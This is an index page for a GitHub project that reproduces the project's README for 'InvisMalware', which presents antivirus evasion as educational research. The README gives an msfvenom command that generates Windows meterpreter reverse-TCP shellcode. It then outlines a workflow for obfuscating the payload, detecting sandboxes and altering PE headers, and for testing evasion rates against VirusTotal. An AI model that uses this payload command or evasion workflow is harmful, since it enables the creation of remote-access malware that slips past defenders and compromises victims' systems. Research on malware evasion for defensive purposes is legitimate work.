Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/mawg0ud/invismalware
A Malware Evasion Technique, shellcode generation, syntax modification, anti-dynamic analysis & PE header modification.
https://github.com/mawg0ud/invismalware
antivirus cybersecurity dynamic-analysis exploit infosec malware payload research security shellcode static-analysis threat
Last synced: 7 days ago
JSON representation
A Malware Evasion Technique, shellcode generation, syntax modification, anti-dynamic analysis & PE header modification.
- Host: GitHub
- URL: https://github.com/mawg0ud/invismalware
- Owner: mawg0ud
- License: mit
- Created: 2024-06-04T05:18:28.000Z (8 months ago)
- Default Branch: main
- Last Pushed: 2025-01-26T08:30:51.000Z (14 days ago)
- Last Synced: 2025-01-26T09:24:09.149Z (14 days ago)
- Topics: antivirus, cybersecurity, dynamic-analysis, exploit, infosec, malware, payload, research, security, shellcode, static-analysis, threat
- Language: Python
- Homepage:
- Size: 644 KB
- Stars: 9
- Watchers: 2
- Forks: 3
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE.txt
Awesome Lists containing this project
README
# InvisMalware: Advanced Malware Evasion Techniques
## Table of Contents
1. [Introduction](#introduction)
2. [Features](#features)
3. [Installation](#installation)
4. [Usage](#usage)
5. [Experiment Methodology](#experiment-methodology)
6. [Testing](#testing)
7. [Contributing](#contributing)
8. [License](#license)---
## Introduction
**InvisMalware** is a project designed to demonstrate advanced malware evasion techniques that bypass antivirus detection. This research-driven malware experiment focuses on utilizing obfuscation methods, such as code modifications and anti-sandbox strategies, to evade static and dynamic malware detection.This project is **for educational purposes** only, intended to provide insights into modern malware defense strategies by learning from the evasion techniques used by malicious actors.
---
## Features
- **Shellcode Generation**: Create custom reverse TCP shell payloads using msfvenom.
- **Code Obfuscation**: Modify malware code to evade antivirus detection by adding NOPs, manipulating PE headers, and more.
- **Anti-Dynamic Analysis**: Include checks to detect sandbox environments such as audio driver and USB device presence.
- **PE Header Manipulation**: Disguise the malware by tweaking the Portable Executable (PE) header to avoid signature-based detection.
- **Evasion Rate Calculation**: Measure the effectiveness of evasion techniques by comparing results across various antivirus engines.---
## Installation
To get started, clone the repository and install necessary dependencies.### Prerequisites
- Python 3.x
- VirtualBox/VMware (for testing in virtual environments)
- **Metasploit Framework** (for generating shellcode)
- **PE-bear** (for PE header manipulation)### Clone the Repository
```bash
git clone https://github.com/mawg0ud/InvisMalware.git
cd InvisMalware
```### Install Dependencies
```bash
pip install -r requirements.txt
```---
## Usage
### 1. Generate Malware Shellcode
Use msfvenom to generate reverse TCP shellcode:
```bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f c > evilexp.c
```### 2. Modify the Shellcode
Edit the `evilexp.c` file to obfuscate the code and avoid detection.### 3. Run in Virtual Machine
Deploy the malware in a secure, isolated virtual machine to test its behavior and measure detection rates.### 4. Upload to VirusTotal
Upload your malware to [VirusTotal](https://www.virustotal.com/) to evaluate its evasion rate across multiple antivirus engines.---
## Experiment Methodology
The project follows a four-stage methodology to achieve malware evasion:
1. **Shellcode Generation**: Create baseline reverse shellcode.
2. **Code Modification**: Obfuscate the shellcode to evade detection.
3. **Anti-Dynamic Analysis**: Add sandbox detection to bypass dynamic analysis tools.
4. **PE Header Modification**: Alter the PE header to further obfuscate the malware signature.---
## Testing
### Local Testing
Run the malware on your virtual machine equipped with antivirus software such as **Kaspersky**, **Windows Defender**, or **Bitdefender**.### VirusTotal Testing
Upload the modified malware to **VirusTotal** and check how many antivirus engines successfully detect it.---
## Contributing
We welcome contributions to improve the project. If you'd like to contribute:
1. Fork the repository.
2. Create a new branch for your feature or bug fix.
3. Submit a pull request with detailed information about your changes.---
## License
This project is licensed under the MIT License. See the [LICENSE](LICENSE.txt) file for details.---